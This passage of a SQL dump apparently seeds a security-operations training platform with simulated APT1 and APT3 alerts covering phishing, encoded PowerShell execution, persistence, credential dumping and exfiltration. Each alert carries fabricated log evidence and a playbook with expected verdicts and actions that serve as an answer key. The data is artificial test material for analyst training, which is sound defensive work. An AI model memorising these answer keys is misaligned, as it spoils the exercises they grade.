2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:29:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"},{\"timestamp\":\"2026-02-01T20:28:18.974Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T09:23:45Z\\\",\\\"event_id\\\":\\\"RECOVERY-20231015-0001\\\",\\\"source\\\":\\\"system_recovery\\\",\\\"action\\\":\\\"remediation_implemented\\\",\\\"affected_systems\\\":[{\\\"hostname\\\":\\\"server1.internal.network\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"203.0.113.15\\\",\\\"malicious_ip\\\":\\\"198.51.100.34\\\",\\\"compromised_user\\\":\\\"j.doe\\\",\\\"affected_files\\\":[{\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"file_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\"}],\\\"remediation_actions\\\":[\\\"blocked_ip\\\",\\\"reset_credentials\\\",\\\"removed_malicious_files\\\"]}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(379, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT1 has initiated the attack by sending a spear-phishing email containing a malicious attachment to gain initial access.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"email_id\":\"c2b2d5f8-8f5a-4e6b-bef8-7b2d1e2e9f30\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"victim@targetdomain.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_2023.pdf.exe\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a trojan used by APT1.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Abuse DB\",\"verdict\":\"malicious\",\"details\":\"IP used in previous phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name mimics legitimate invoice documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.975Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(380, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) logs', 'The malicious attachment was opened, leading to the execution of a payload that attempts to establish a foothold within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24=\",\"file_hash\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"filename\":\"malicious_attachment.docx\",\"threat_level\":\"high\",\"description\":\"Suspicious PowerShell command execution detected.\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"reputation_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_attachment.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to deliver malicious payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(381, 'Persistence Mechanism Installed', 'medium', 'Registry and Scheduled Task Logs', 'APT1 establishes persistence by creating scheduled tasks and modifying registry keys to maintain access even after reboots.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:35Z\",\"event_id\":7045,\"source\":\"Service Control Manager\",\"description\":\"A service was installed in the system.\",\"service_name\":\"UpdateService\",\"service_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"registry_modification\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\UpdateService\",\"scheduled_task_creation\":{\"task_name\":\"UpdateTask\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\updatetask.exe\",\"task_user\":\"SYSTEM\"},\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by APT1.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"Username used in suspicious 
activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k 
netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the 
system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:52:35Z\\\",\\\"event_id\\\":7045,\\\"source\\\":\\\"Service Control Manager\\\",\\\"description\\\":\\\"A service was installed in the system.\\\",\\\"service_name\\\":\\\"UpdateService\\\",\\\"service_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\",\\\"registry_modification\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\UpdateService\\\",\\\"scheduled_task_creation\\\":{\\\"task_name\\\":\\\"UpdateTask\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\updatetask.exe\\\",\\\"task_user\\\":\\\"SYSTEM\\\"},\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"external_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"admin\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(382, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM) alerts', 'APT1 is attempting lateral movement by utilizing harvested credentials to access critical systems within the network. Anomalous login attempts detected from an unauthorized source IP address.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:17Z\",\"event_id\":\"4625\",\"log_source\":\"Windows Security Log\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"admin_user\",\"logon_type\":\"3\",\"failure_reason\":\"Unknown user name or bad password\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_message\":\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\"}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Username of a privileged 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. 
Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. 
Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.978Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:17Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"log_source\\\":\\\"Windows Security Log\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"admin_user\\\",\\\"logon_type\\\":\\\"3\\\",\\\"failure_reason\\\":\\\"Unknown user name or bad password\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"event_message\\\":\\\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(383, 'Data Exfiltration Attempt', 'high', 'Network Traffic Analysis', 'In the final phase, APT1 attempts to exfiltrate sensitive data to an external server, marking the culmination of the attack.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:22:35Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"bytes_sent\":10485760,\"uri\":\"/api/upload\",\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"john.doe\",\"status_code\":200}', '2026-01-04 00:59:40', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT1 command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"File contains sensitive data intended for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials possibly 
compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(384, 'Spear Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT3 initiates their attack with a well-crafted spear phishing email, targeting key employees to gain a foothold into the network. The email contains a malicious attachment designed to exploit the recipient\'s system.', 'Initial Access', 'T1566.001', 1, 'Closed', 290, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"email_subject\":\"Urgent: Action Required for Your Account\",\"email_sender\":\"john.doe@fakecompany.com\",\"email_recipient\":\"jane.smith@targetcompany.com\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-01-04 02:06:57', '2026-03-12 15:08:59', 